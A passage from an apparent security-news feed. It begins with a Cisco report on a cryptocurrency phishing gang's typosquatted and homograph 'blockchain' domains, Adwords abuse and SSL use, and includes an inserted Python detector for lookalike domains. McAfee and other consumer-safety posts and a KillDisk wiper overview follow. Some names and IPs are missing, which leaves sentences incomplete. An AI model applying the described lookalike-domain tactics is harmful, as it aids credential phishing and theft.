We can see the Second Level Domain (SLD) strings in these domains follow a similar pattern of targeting with many permutations of the string "blockchain", along with co-occurrences of "http", "https", "wallet" in the SLD string. Here is a graph visualization of the domains on these infrastructures:

Geographic Targeting

One of the most interesting facets to these attacks are the geographic regions of the victims. Using data from Umbrella Client Requester Distribution queries to these malicious domains, we can see a significant number of DNS resolution requests coming from countries such as Nigeria, Ghana, Estonia and many more.
This threat actor appears to be standing up phishing pages to target potential victims in African countries and other developing nations where banking can be more difficult, and local currencies much more unstable compared to the digital asset. Additionally, attackers have taken notice that targeting users in countries whose first language is not English makes for potentially easier targets. Based on the number of queries, this campaign is one of the biggest targeting to date. has been very proactive in supporting users. Kristov Atlas, a security and privacy engineer at, has even gone so far as to say "phishing is one of our top areas of concern in protecting our users."

Quantifying Attacker's Revenue

Cisco has evidence the COINHOARDER group has been actively pilfering Bitcoin since at least 2015. Based on our findings, we estimate this group has stolen tens of millions of USD in cryptocurrency. While working with Ukraine law enforcement, we were able to identify the attackers' Bitcoin wallet addresses and thus could track their activity for the period between September 2017 and December 2017. In this period alone, we quantified around $10M stolen. In one specific run, they made $2M within a 3.5-week period. Here we have a screenshot of one of the wallets, 19yAR4yvGcKV3SXUQhKnhi43m4bCUhSPc, related to this actor group, which has received a total of $1,894,433.09.
While identifying the individual who owns a specific wallet is extremely difficult, we still can look for open source intelligence surrounding the wallet. In December 2017, Cisco found posts on Reddit and Stack Exchange with addresses associated with stolen funds from this campaign, 13wahvu3FP8LK8P51UmEkhBUhyC7mzkrn3.

The wallet address in the screenshot above was also mentioned in a Reddit post in October 2017.

Based on our findings associated with this syndicate, we estimate the COINHOARDER group to have netted over $50M over the past three years. It is important to note that the price of Bitcoin shot up drastically over 2017, starting around $1,000 in January and hitting a high point just under $20,000 in December. While criminals were able to profit from this, it also adds a new level of complexity for criminals to convert their cryptocurrency funds to a fiat currency like US dollars. The historic price of Bitcoin during the height of this campaign would have made it very difficult to move these ill-gotten finances easily.

Ukraine: A Hotbed For Crypto Theft

Ukraine is a hotbed for many types of attacks and a home for known bulletproof hosting providers. In the past year, Cisco has witnessed a substantial rise in financially motivated campaigns coming from and targeting this region. One of Cisco's goals is to collaborate with countries worldwide and use our global visibility on attacks to assess their security posture and help improve it.

Some other observed IPs are and, which host domains targeting many currencies using IDN and SSL certs and are hosted on VServer in Ukraine. We also observed AS 58271 hosting multiple search engine poisoning attacks on Google and Bing:

New Effective Attack Techniques

Cisco has observed this threat actor evolve over time. Not only have we seen the COINHOARDER group abuse Google Adwords to generate traffic to their phishing servers, but we have also observed this group evolve to make their sites appear more legitimate. A few months after we began tracking this particular group, we observed them starting to use SSL certs issued by Cloudflare and Let's Encrypt. SSL certificate abuse has been a rising trend among phishing campaigns in general. Below is an example of a wildcard SSL certificate issued by Cloudflare for the domain bockchain[.]info.
Here is an example of one of these SSL certificates issued by Let's Encrypt associated with this campaign and the site blockcharin[.]info.
The COINHOARDER group has made heavy use of typosquatting and brand spoofing in conjunction with SSL-signed phishing sites in order to appear convincing. We have also observed the threat actors using internationalized domain names. These domains are used in what are called homograph attacks, where an international letter or symbol looks very similar to one in English. Here are some examples from this campaign.

The Punycode (internationalized) version is on the left, the translated (homographic) version on the right:

xn--blockchan-d5a[.]com → blockchaìn[.]com

xn--blokchan-i2a[.]info → blokchaín[.]info

These attacks can be nearly impossible to spot with the human eye, especially when delivered on a mobile platform, and using these techniques helps coax users into handing over their funds.
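The lookalike domains in this post fall into two classes a resolver or proxy can test for: IDN homographs such as the two Punycode examples above, and plain typosquats such as block-clain[.]info or blockcharin[.]info. The following added example (written for this post, not Cisco's code) decodes xn-- labels with Python's punycode codec, strips diacritics to get an ASCII skeleton, and scores that skeleton against a brand list by edit distance; the brand list, the distance threshold and the sample domains are constructed assumptions, and the real brand-owned domains would be allowlisted by the caller.

```python
"""Flag IDN homograph and typosquat domains against a protected brand list.

Added example, not Cisco's code. Brand list, threshold and sample domains
are constructed assumptions; the two xn-- examples are from the post.
"""
import codecs
import unicodedata

PROTECTED_BRANDS = {"blockchain"}   # constructed: brands we defend
MAX_DISTANCE = 2                    # constructed: max edit distance to flag


def decode_idn(domain):
    """Turn 'xn--blockchan-d5a.com' into its Unicode form 'blockchaìn.com'."""
    labels = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            label = codecs.decode(label[4:].encode("ascii"), "punycode")
        labels.append(label)
    return ".".join(labels)


def skeleton(label):
    """ASCII skeleton: drop diacritics (NFKD + combining marks) and hyphens,
    so 'blockchaìn' and 'block-clain' compare against plain 'blockchain'."""
    decomposed = unicodedata.normalize("NFKD", label)
    return "".join(c for c in decomposed
                   if not unicodedata.combining(c) and c != "-")


def edit_distance(a, b):
    """Levenshtein distance with a rolling single-row table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def assess(domain, allowlist=frozenset()):
    """Describe why a domain resembles a protected brand, or return None.

    Only the second-level label is scored; TLD swaps are not considered.
    """
    if domain.lower() in allowlist:
        return None
    unicode_form = decode_idn(domain)
    sld = unicode_form.split(".")[0]
    skel = skeleton(sld)
    brand, dist = min(((b, edit_distance(skel, b)) for b in PROTECTED_BRANDS),
                      key=lambda pair: pair[1])
    if dist > MAX_DISTANCE:
        return None
    return {
        "domain": domain,
        "unicode": unicode_form,
        "skeleton": skel,
        "brand": brand,
        "distance": dist,
        "idn": domain.lower().split(".")[0].startswith("xn--"),
        "exact_after_normalization": dist == 0,
    }


def scan(domains, allowlist=frozenset()):
    """Return the assessment records for every flagged domain in order."""
    hits = (assess(d, allowlist) for d in domains)
    return [h for h in hits if h is not None]


# Constructed sample: the post's two IDN examples plus typosquats it names,
# with a benign domain to show a clean result.
SAMPLE_DOMAINS = [
    "xn--blockchan-d5a.com",
    "xn--blokchan-i2a.info",
    "block-clain.info",
    "blockchalna.info",
    "bockchain.info",
    "blockcharin.info",
    "example.com",
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_DOMAINS):
        print(rec)
```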


Crypto assets have proven to be a new, valuable financial commodity targeted by varying degrees of cyber criminals. In 2017, we observed phishers advance their tactics by utilizing new attack vectors such as Google Adwords combined with the use of IDNs and rogue SSL certificates to improve their probability of success, and generate millions in profit.

What is clear from the COINHOARDER campaign is that cryptocurrency phishing via Google Adwords is a lucrative attack on users worldwide. Phishers are significantly improving their attack techniques by moving to SSL and employing the use of IDNs to fool victims into handing over their credentials. We can expect to see more of these realistic looking phishes with Let's Encrypt releasing full wildcard certificate support at the end of this month. Cisco will continue to monitor the landscape and coordinate with international law enforcement teams in 2018 to help protect users and organizations.


The following IP addresses are known to have been used in these phishing attacks:


    Additional ways our customers can detect and block this threat are listed below.

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on



    Here you can view more about how Cisco Security has worked hard on helping secure the cryptocurrency landscape:

    8 Easy Ways to Hack-Proof Your Family’s Smartphones

    Smartphones have changed the face of parenting in profound ways. But for all the efficiency they’ve introduced into family life, those same devices simultaneously bring risk.

    With smartphone and tablet use growing at ten times the rate of PCs, hackers know precisely where to shift their focus these days. Cyber thieves love smartphones because once inside, they can access private information, location, email, photos, social media, and bank accounts.

    If you’re a parent, a smartphone breach is an even bigger deal. Shoring up the security gaps in your phone isn’t a big deal but what about the other four or more smartphones under your roof? If you were to multiply the risk, you’d soon realize the potential havoc that’s looming.

    While you can’t shut out every digital risk, you can tackle the most prominent ones. Let’s get started!

    8 Ways to Hack-Proof Your Family’s Smartphones

    1. Think Like a Criminal. Work a potential hack backward. Look at every possible entryway into your phone and ask yourself, “How could I get into this phone if I were determined?” Then, methodically lock up each digital door. Challenge yourself to find every security gap. Examine your password strength, social profiles, web browsing security, general and app settings.
    2. Juice Up Your Password. How do you create a password that a criminal can’t hack? With great intention and a few extra layers. 1) Avoid the common error of using easy passwords such as “12345” or “password.” Get complex and create a combination that isn’t logical. 2) Use multi-factor authentication (MFA). Having multiple factors to authenticate your phone use, such as your fingerprint, face, or a trusted device, increases security. Most smartphones offer MFA so, even if it seems tedious, use it. The more factors — or digital layers — you can combine, the more protected your smartphone will be. Too many passwords crowding your brain? Consider a password manager.
    3. Trust No App. Not all apps you download to your phone are created equal. Many third-party apps do not go through the rigorous security vetting of Google or Apple. Hackers can infect apps with malware or viruses that demolish your phone’s security and allow hackers access to your data. Beware. Examine all apps, read reviews, and steer clear of apps that ask for too much access. Even legitimate apps can be used for malicious purposes such as listening in via a phone’s microphone and even spying using a phone’s camera. To pull back an app’s access, just go to your settings. On Android: Go to Apps and Notifications, choose App Permissions and make changes. On iOS: Go to your settings, select Privacy, and make changes to app permissions accordingly.
    4. Passcode, Track Your Phone. Be proactive in case your phone gets stolen or lost. Make sure your device is passcode and fingerprint protected. Take a few minutes to enable phone tracking. For Android, you’ll download the app Find My Device and for Apple use Find My iPhone. Make sure those apps are always enabled on your phone. If your phone is lost or stolen it can be tracked online.
    5. Log out, Lock Online Services. If you bank, shop, or access sensitive accounts via your smartphone, do it with extreme care. This means logging out and locking those accounts when not in use and avoiding auto-login features. Instead, use a password manager app that forces you to re-enter a master password each time you want to access an account. It’s worth the extra step. An essential part of this equation is disabling keychain and auto-fill in your browser. You can do this by finding your web browser in Settings and toggling each option to OFF. Also, avoid using public Wi-Fi for accessing sensitive accounts or conducting any transactions.
    6. Turn Off Bluetooth. Bluetooth carries inherent vulnerabilities and is another open door for hackers to enter. When Bluetooth is turned on it is constantly looking for other open connections. Hackers work quickly through open Bluetooth connections, and often victims don’t even know there’s been a breach (there’s no evidence a phone has connected with a criminal source). Make sure to switch Bluetooth off if you are not using it.
    7. Take Updates Seriously. Because people design phones, phones will be flawed. And, it’s just a matter of time before a hacker discovers and exploits those flaws. Developers use updates to combat all kinds of breaches, which make them critical to your phone’s security. Along with staying on top of updates, consider the added safeguard of antivirus, identity, and privacy protection that covers all family devices.
    8. Stop! Don’t Click that Link. Unless you are 100% sure of the legitimacy of a link sent to you through text, email, or direct message, do not click it. Random links sent by hackers to access your data are getting more and more sophisticated as well as destructive.





    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

    The post 8 Easy Ways to Hack-Proof Your Family’s Smartphones appeared first on McAfee Blogs.

    Global cybercrime behemoth busted, 36 people indicted

    According to US authorities, the enterprise aimed at becoming the premier destination for the buying and selling of stolen payment card data and forged identification documents. It is believed that the losses that the Infraud Organization had intended to cause were north of $2.2 billion.

    The post Global cybercrime behemoth busted, 36 people indicted appeared first on WeLiveSecurity

    5 Digital Family Values to Embrace to Make the Internet a Better Place

    A better internet — one free of bullying, division, hate, and crime — isn’t just an aspiration, it’s truly possible. And, it starts with the individual digital user. It starts with you, with me, and the next generation of users we’re raising up. That’s the message of the annual worldwide Safer Internet Day, which is Tuesday, February 6.

    The global movement has a message this year to “create, connect and share respect” online and challenges everyone from parents, to youth, to educators, to businesses to focus on how to use the internet’s power to bring people together.

    We’ve put together a list of values to consider that might help your family respond to the challenge of Safer Internet Day. Can one family make the internet a safer, more positive place for us all? We think so. People effect change and influence millions of people every day online. Each one of us has the choice to lead or sit on the sidelines on this critical topic. Even the smallest act of kindness or respect online generates digital ripples. So, just begin. (You can also join in the worldwide social media push with a Thunderclap post supporting #SID2018 on the morning of Feb. 6 to kick start Safer Internet Day!)

    5 Digital Family Values to Upload Every Day

    1. The value of the pause.

      The online culture gives our discernment a workout every second, doesn’t it? Teaching kids to become critical thinkers who are responsible for their online choices is a value that is reinforced in big and small ways every day. A few questions to challenge kids to ask before posting might be:

    • Is this a value I share or am I just echoing my friends?
    • Am I too emotional to be online right now?
    • Do I have all the facts before I respond?
    • What’s the flip side of this issue, the other opinions?
    • Is what I want to say online necessary, helpful, or kind?
    2. The value of empathy.

      Empathy is making a genuine attempt to understand another person’s struggle and it’s a powerful way to combat bullying, hate, and prejudice online. Digital communication can make it harder to feel empathy for other people. Hearts get lost in the clicking, liking, and sterile acronyms. Looking for ways to teach empathy means highlighting real-life situations and asking your kids to think deeper, put themselves in another person’s shoes, and genuinely reflect on the emotional fallout.

    3. The value of responsibility.

      Making the internet a safer place for all requires parents and kids to embrace, repeat, and consider the basic safety principles that create our digital footprint. One way is to help kids understand their digital footprint and the responsibility that comes with owning a digital device of any kind. Pose these questions to your child:

    • Is this something you really want everyone to know that about you?
    • What do you think this photo communicates about you (use adjectives)?
    • How do you think that person would feel if he or she saw your post about them a few years from now?

    One of the best ways to grow your child’s sense of digital responsibility is to role-play. Find teachable moments in which empathy or responsible online behavior has been ignored.

    Ask your child questions that will challenge him or her to verbalize what another person might be feeling or thinking. Putting words to a cruel or unfair situation brings it to life and is an effective way to dismantle stereotypes, prejudices, and digital inequities.

    4. The value of media literacy.

    Media literacy is a skill that allows digital users to become critical thinkers and creators, effective communicators, and active digital citizens. This means we all play a role in making the Internet a safe place to exchange ideas and appropriate content. is an excellent media literacy equipping hub for families and educators.

    5. The value of parental example.

    If you’re serious about influencing your child’s behavior online, the most powerful teacher is you. Take inventory. Be the example of a balanced, responsible, empathy-driven internet user. Model balance. Limit your time on social networks when at home, unplug consistently, don’t let technology come before people. Model responsibility. Post and comment wisely, and always keep your emotions in check online. Model humility. Part of being the example includes being able to admit your digital mistakes. Kids need to know you aren’t perfect and learn from how you handled a digital situation such as cyberbullying, a political argument, or even a closeted tech addiction. Be open, honest, and candid in leading your kids in social appropriateness. Model empathy. Be sensitive to others online. Use your wisdom to mend a broken situation and do the harder thing in an emotion-charged circumstance. Your kids are watching you.


    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 


    The post 5 Digital Family Values to Embrace to Make the Internet a Better Place appeared first on McAfee Blogs.

    Follow the trail of evidence – 02.20.18

    So you’ve been breached. Gigabytes upon gigabytes of data are now in the hands of…well, someone. It could be the guy across the hall who just got fired; perhaps it was a competitor; or maybe it was just some hacker looking for a quick payday. In any case, trust in your organization is dwindling. Your bosses, the customers, and the media are all breathing down your team’s collective necks, demanding answers. What do you do next?

    That’s what we’ll be investigating this coming February 20th, during the launch of the new eLearnSecurity training course, Digital Forensics Professional (DFP).

    Letting the evidence speak

    For our first course of 2018, we look into the overlap between tech and criminal justice—the field of digital forensics.

    Much like traditional crime scene investigations, digital forensics involves the collection and analysis of information that could be used to reconstruct a certain incident, or as evidence in tracing a cyber attack back to its source—usually with the goals of asset recovery, attribution, or criminal/civil prosecution. Such incidents include cyber attacks, data theft, industrial espionage, and even non-criminal acts like internal investigations within organizations.

    Digital Forensics Professional introduces security professionals to the more inquisitive side of cybersecurity. The course enables students not only to investigate cyber crimes, but also to assist in cases of incident response or proactive threat hunting.

    Regardless of your role in your team, DFP ensures that you gain the skills to make you an all-around and valuable blue team member.

    The investigation begins…

    We open the DFP case files on February 20, 2018 at 1:00 PM ET. Join us in this live launch webinar by signing up here.

    As usual, two lucky attendees will get to begin their Digital Forensics Professional training for free, while everyone else will be first-on-scene for our #DigitalForensicsPro launch deals.

    The Reality of an Incoming C1 Cyberattack on the UK

    “When, not if.”

    Ciaran Martin, head of the U.K.’s National Cyber Security Centre (NCSC), used those words to say he expects a devastating cyberattack to hit the U.K. in the next two years. The attack, he believes, will bring disruption to British elections and critical infrastructure. These remarks were made in light of newly released figures detailing the number of cyberattacks on the U.K. in the last 15 months. Martin said the U.K. has been fortunate to avoid a so-called category one (C1) attack, broadly defined as an attack that might cripple infrastructure such as energy supplies and the financial services sector.

    His prediction initially brings one thing to mind – WannaCry. A strain of the ransomware impacted 50 countries and infected more than 250,000 machines in just one day. Its exploits included a massive takedown of 16 U.K. NHS medical centers. WannaCry was rated by the NCSC as a C2 level of attack, milder than the C1 Martin says is still to come.

    Organisations across the U.K. were unprepared when WannaCry hit last May, and there is no simple fix to protect everyone. Martin concedes total protection is impossible, stating “Some attacks will get through. What you need to do is cauterise the damage.” The NCSC has been gradually building defenses and is due to publish a 60-plus-page dossier outlining what has worked and what has not since it opened in October 2016. Defense is a responsibility that falls on all of our shoulders, and begins with a new mentality that attacks are inevitable, and preparedness vital for a “culture of security.”

    There is a misconception that cybersecurity is an IT issue that affects systems, not ordinary people. The reality is that cybercrime hurts us all. A massive cyberattack impacts economies, governments, innovation, growth, even the global state of mind. If we all accept the reality of a potential C1 attack, we also accept the challenge to bond together in a new pact to protect the assets and values we hold dear. We must do this. It’s a matter of when, not if.

    To learn more about the modern-day threat landscape, be sure to follow us at @McAfee and @McAfee_Labs.

    The post The Reality of an Incoming C1 Cyberattack on the UK appeared first on McAfee Blogs.

    How to Treat Your Family’s Personal Data Like Gold in a Hyper-Connected World

    Tomorrow, January 28, is National Data Privacy Day. While that may not mean a lot to you at first glance, the day shines a light on one of the most critical issues facing families today — protecting personal information in a hyper-connected world.

    The day gives us an opportunity to 1) honestly examine the many ways our lives are connected and, 2) to take responsibility (and steps) to safeguard each area of personal privacy we expose — or potentially misuse — every time we power up.

    Data Channels

    Every day we connect our lives to external sources that are useful, productive, and entertaining without even realizing the many ways others can exploit our digital connections. There are the obvious sources that present a risk to our data such as social networks, online shopping, web browsing, and apps. Then there are the not-so-obvious sources that gather our information such as medical offices, schools, financial institutions, retail businesses, household assistants, TVs, home security systems, appliances, toys, and wearables.

    Studies show that most of us certainly are not going to give up our connected lives to prevent a data breach. So, the next practical step is to get more intentional about our family’s privacy and take specific actions to minimize our risk.

    The Risks Are Real

    If you’ve never suffered the consequences of another person or organization exploiting your personal information, then you may not understand the seriousness of protecting it. However, as we all become more seamlessly connected in an Internet of Things (IoT) world, chances are you will experience some data misuse or abuse in the future. Those acts might be large-scale breaches such as the ones we’ve seen with Equifax, Uber, and Verizon or the breach may be on a smaller scale but just as financially and emotionally damaging.

    When personal data gets hacked, sold, or exploited several things can happen. Digital fallout includes identity theft, credit card fraud, medical fraud, home break-ins, data misuse by companies, reputation damage, location and purchasing tracking, ransomware, and much more.

    So the technology-driven future we’ve imagined is here — and it’s pretty awesome — but so too are the risks. And who among us could have guessed that parenting in the 21st century would include teaching kids about cybercriminals, data mining, and privacy breaches?

    Step-Up Family Privacy

    Treat privacy like gold. If more of us saw our personal information the way cybercriminals see it — like gold — then we may be more inclined to lock it up. Guiding your family in this mind-shift requires real effort. Teach your kids to view their personal information — address, habits, personal routine, school name, relationships, passwords, connected devices — as gold. Gold is to be treasured, locked up, and shared with great discernment. This attitude change may take time but, hopefully, the return on investment will mean your kids pause before handing over personal info to an app, a social network, a retail store, or even to friends.

    Stress responsibility and respect. Stopping to think before you share online or connect a digital device is a key to safeguarding digital privacy. By teaching your kids that living in a connected world comes with responsibility for one’s actions and respect for others, you take a leap in securing your family’s online privacy.

    Routinely secure the basics. There are fundamental security measures under our roofs that cybercriminals are counting on all of us to neglect (and many of us do just that). Powerful security steps include: 1) Update all software (PC, phone, tablets, etc.) routinely 2) Establish and maintain strong passwords 3) Secure privacy settings on all social networks 4) Lock down your home network 5) Don’t overshare family details (names, travel, location, address, friends) online.

    Make privacy fun. Here’s something to ponder. Challenge your kids to keep a low profile online. Talk about the power of being discreet, private, and mysterious in their digital peer group. Encourage them to set themselves apart by being the one who isn’t so easily accessed. Ask: Is digital sharing an enjoyable thing or, in reality, has it become an exhausting habit? Challenge them to go undercover (dark) online for a week and journal the pros and cons of being hyper private online. Come up with an incentive that works for your family.

    Enjoy the Wows

    Overall, stop and consider what your digital devices, apps, games, and products are asking of you. Is that fitness tracker getting a little too personal? Does that new toy, home security system, or household assistant know more about your family than your own mother does? Then don’t fill in every blank box. Go into the privacy settings and shore up product access, freshen up your passwords, and make sure you stay on top of software updates. Stop giving retailers, government agencies, and online marketers your email address. In short — pay attention, protect, and cherish your personal data. You can enjoy the wows of your technology without opening up your family’s privacy.


    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

    The post How to Treat Your Family’s Personal Data Like Gold in a Hyper-Connected World appeared first on McAfee Blogs.

    Your Back To School Tech Plan

    I am such a fan of school holidays! No music lessons, no sport, no commitments. Bliss!! The crazy school term routine is no more and people can just ‘be’. Marvellous!! But all good things must come to an end. So, unless you want the police knocking on your door, the kids must go back to school. Ughh! So much to do. Where to start?

    So, there’s shoes, uniforms, enrolments in music, drama and sport, haircuts, stationery and then of course, all things technology! Ah yes, the ‘t’ word. When you’re juggling work, running a house and a tribe of kids, managing your kids and their tech lives can be overwhelming. But as parents, it is essential that we take the time to make sure we have all things technology covered for our kids.

    What Are The Main Risks Kids Face Online?

    The internet, our connected devices and online activity are such a huge (and permanent) feature of our modern lives. As parents, we owe it to our kids to make sure we can prevent some of the dangers associated with a connected life. Whether it’s phishing scams, online predators, oversharing, downloading malware, falling for an online scam or worst case, becoming the victim of cyberbullying, teaching our kids how to navigate some of the perils of the online world is essential.

    How Can I Help My Kids Navigate Online Dangers?

    Without a doubt, the absolute best way of protecting our kids is taking the time to better understand how the online world really works. And I understand that means time – something many of us just don’t have. But if you could scan the tech news of your favourite online news site every day and then allocate 20 minutes each week to research a new app or social media platform, you’d be surprised how quickly you could get yourself into good cyber parenting shape.

    The Back To School To-Do List

    But let’s keep it simple. It’s already January and there isn’t a lot of time left to get organised. So, here’s what I think you should focus on tech-wise to make sure you can cross technology off your ‘back to school’ to-do list.

    1. Install Security Software On ALL Devices.

    Many people invest in security software for their laptops, which is great. However, all devices need to be protected. Anything you can download on a laptop, you can download on a tablet or phone.

    Many security software packages will include coverage for a ‘fleet’ of devices. McAfee® Total Protection software provides premium antivirus, identity and privacy protection for all your PCs, Macs, smartphones and tablets – in one subscription. Easy!

    2. Know How To Connect Safely On Public Wi-Fi Networks.

    Wi-Fi can be an extraordinarily risky affair with hackers spending a lot of time developing ways to extract users’ personal information. If your kids absolutely must connect, ensure it is a secured Wi-Fi which means it requires a password. However, this is still not 100% safe so no banking, financial or shopping transaction should be conducted on Wi-Fi.

    Why not consider investing in a Virtual Private Network (VPN)? A VPN provides a secure encrypted connection which means that anything you send or receive is safe. Check out McAfee’s VPN, McAfee® Safe Connect – it provides bank-grade Wi-Fi encryption, which means you can relax!

    3. Schedule Regular Data Backups.

    ‘Losing’ a document is so frustrating! Avoid those late-night homework traumas and ensure your kids have regularly scheduled data backups for their main devices. You could choose to back up to a hard drive, but I think an online backup service is probably easier to use. Whether it’s Google Drive, Dropbox or OneDrive – find an online provider and set this up BEFORE school projects get underway!

    4. Ensure All Device Software Is Up-To-Date.

    Software updates (and reminders) can be super annoying and interrupt the flow of a busy day. But keeping your software up-to-date is actually one of the best ways of protecting yourself from the latest online threats.

    Why not select auto-updates for software on all your devices – including your smartphones? If your software doesn’t offer auto-updates, schedule a monthly reminder in your calendar to check for and install available updates.

    5. Understand Your Child’s School BYOD Policy.

    Make sure you understand the Bring Your Own Devices (BYOD) policy of your child’s school. Some schools require parents to be responsible (and pay) for repairs, insurance and online security associated with your child’s laptop or tablet; others will provide this for an annual fee. Please take the time to understand this before the school year starts and an issue occurs.

    I know it may seem like a bit of work but taking these precautionary steps now means your kids are as protected as can be when enjoying their online lives and of course doing their homework this year! And make sure you also take the same steps to protect the adults (and their devices) in your house as well! They are just as important.

    Here’s to a great school year!!

    Take care,

    Alex xx


    The post Your Back To School Tech Plan appeared first on McAfee Blogs.

    Determined to Find Love Online in 2018? Here are 5 Ways to Protect Your Privacy

    It turns out January is the busiest month for online dating since millions of singles have resolved to embark on new adventures — and even finding love — in 2018.

    And why not? According to the Pew Institute, over the last ten years, online dating has lost a lot of its stigma, and a majority of Americans now say online dating is a great way to meet people.

    But before you start answering personal questions, uploading photos, and chatting with strangers on dating apps like Match, Bumble, Plenty of Fish, eHarmony, Tinder, or OkCupid, it’s a good idea to add a measure of security to your strategy.

    We’ve all heard stories of online dates that end terribly or even tragically. However, what you may not be aware of is that with just a few small nods toward security, you can enjoy the fun of online dating minus the worry.

    5 ways to protect your privacy on dating apps

    1. Choose a reputable dating app. Check to see if the dating site takes your privacy seriously. Currently, there are hundreds of dating apps and most will ask you dozens, even hundreds, of personal questions to match you with another member. It’s important to understand what the company is planning to do with all of the information it gathers from you. This information should be under the service’s terms of service/use. Consider the following:
    • Does the dating app delete your data after you close your account?
    • Some dating sites make user profiles public by default, which means search engines can index them. You can change this immediately in your account’s privacy settings.
    • A site’s privacy policy should be clear about how it shares your personal information with other members. It should also be clear about any third-party access to your data.
    • Make sure you understand how your uploaded photos will be used and opt out of any advertorial applications.
    2. Keep personal info zipped. Everyone wants to make a great impression, but create your profile with care. Go through your digital footprint (past online activity) and delete any information that gives away too much personal insight into where you live, your family, your favorite places, or your job. Delete details that could help someone track you outside of the dating app. Think carefully about what you write.
    3. Check your digital self. When dating online, take a few extra steps to protect the privacy of your daily routine. 1) Stop using check-in apps 2) turn off the geo-location in your phone settings, which could allow a dating app to track you 3) When using apps like Facebook, Snapchat, and Instagram, choose not to post your location. To take your privacy a step further, go back and delete the location on earlier photos. It’s easier than ever for someone to go into an app and see a mapped pattern of places you frequent. 4) Consider making your social media accounts private for the duration of your online dating.
    4. Beware of the catfish. Unfortunately, catfish — people posing as someone else online — have made their way into dating apps. Do your homework on the other person as much as possible. Check out social profiles. If something feels fishy, rethink meeting IRL (In Real Life). Use Reverse Image Search to make sure a person’s profile picture is legitimate. When messaging within a dating app, never share your location, phone number, banking information (obvious but not for everyone), or workplace. Catfish have become incredibly sophisticated and should not be underestimated.
    5. Inform a friend. This one is more about physical safety but can’t be stated enough. If you arrange to meet with a person outside of the dating app, be sure to let a friend know all the details of the meeting, including the name of the person you are meeting. Agree on a location where your friend can pick you up if there’s a problem. Always meet a “date” in a public place and never allow a date to pick you up or drop you off at your home.

    Thanks to technology, the world is now your digital oyster when it comes to finding love. So, after you’ve locked down a few critical pieces of your online life, don’t forget to have fun . . . and swipe right.


    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

    The post Determined to Find Love Online in 2018? Here are 5 Ways to Protect Your Privacy appeared first on McAfee Blogs.

    How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals

    We all remember Petya/NotPetya. How could you forget? The nasty malware took cues from WannaCry, leveraging the same SMB vulnerability. But instead of locking away files, Petya/NotPetya was a wiper – simply cleaning devices of their data. Petya was not the first wiper we’ve seen, and it’s certainly not the last. In fact, a classic disk wiper is currently re-emerging in Latin America, called KillDisk, and is targeting financial firms. Once dropped on a computer, it will load itself into memory, delete its files from disk, and rename itself.

    KillDisk is actually one of the most infamous malware families around. It has historically masked itself as ransomware, but is rather a very destructive wiper. Cybercriminals typically deploy it in the later stages of an infection so they can use it to hide their tracks by wiping disks and destroying forensic evidence. That’s precisely why it was paired together with the BlackEnergy malware during Telebots’ attacks on the Ukrainian power grid – so the cybercriminals could conduct their scheme with stealth.

    As Christiaan Beek, lead scientist and principal engineer at McAfee claims – that’s a wiper’s bread and butter. He says, “In the past we have seen wipers being used targeting the Energy sector in the Ukraine, Oil & Gas industry in the Middle-East, Media-company and against targets in South Korea. All of these were related to regional or political conflicts.”

    Destruction is clearly the end goal, but stealth is the way of getting there. Beek continues, “In 2017, we introduced the term pseudo-ransomware where destructive attacks disguised as ransomware either took down companies in a nation or were used to keep the IT-department busy while money was being transferred at the same time. Now with KillDisk, it seems that criminals do not hesitate to use it during their campaigns. Since the initial infection vector is unknown and we are lacking further samples or details, we can only speculate why they are using this.”

    That’s the ultimate question – why? Is KillDisk part of a larger attack, intended to help cybercriminals avoid detection? Or are crooks extorting these financial institutions for monetary gain? As of now, we’re unsure of the motive. But we do know that as this threat continues to evolve and creates a convincing smoke screen, we all must be as vigilant as ever.

    To learn more about our fight against ransomware, check out the alliance No More Ransom. And be sure to follow us at @McAfee and @McAfee_Labs.

    The post How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals appeared first on McAfee Blogs.

    2018 Resolution: Lose the Weight of Tech Safety Guilt Once and for All

    January is here, and we’ve got goals to crush. We want to be more productive. We want to spend more quality time with family. We want to get fit and lose some weight. Then there are those brave enough to tackle what’s going on in their parenting knower.

    The knower is located in every parent’s internal command center. It knows what it should do but hasn’t quite gotten around to doing it. It won’t appear on an anatomy chart, but if you are a parent, you know precisely where your knower is because you can feel the weight of the guilt that collects there. One of the biggest guilt generators is knowing what we should do to lock down our family’s digital life, but somehow keep putting it off.

    According to McAfee’s 2018 digital threat predictions, several of the top technology threats coming our way this year target family safety specifically. The first threat: the growing power of the connected home and potential threats to family data privacy from big corporations. And the second threat: risky apps kids use and how companies can use content posted by users.

    Both issues are big deals as our homes become more connected in new ways that are both exciting and, frankly, concerning when it comes to the issue of privacy.

    So who is brave enough to lose the unwanted guilt weight? Here are a few easy things you can do to start 2018 to get your digital life in shape.

    Inventory Your Homefront

    Chances are you’ve accumulated a stockpile of digital products you don’t even realize pose a threat to your family’s security. Those devices likely need a password and privacy setting tuneup. Four steps to home safety: 1) Make a list of your devices 2) go into the settings and make the necessary updates 3) if a software update is needed, do that as soon as you get a notification. 4) To streamline that process, consider a central built-in security product that ensures every device in your house is well protected.

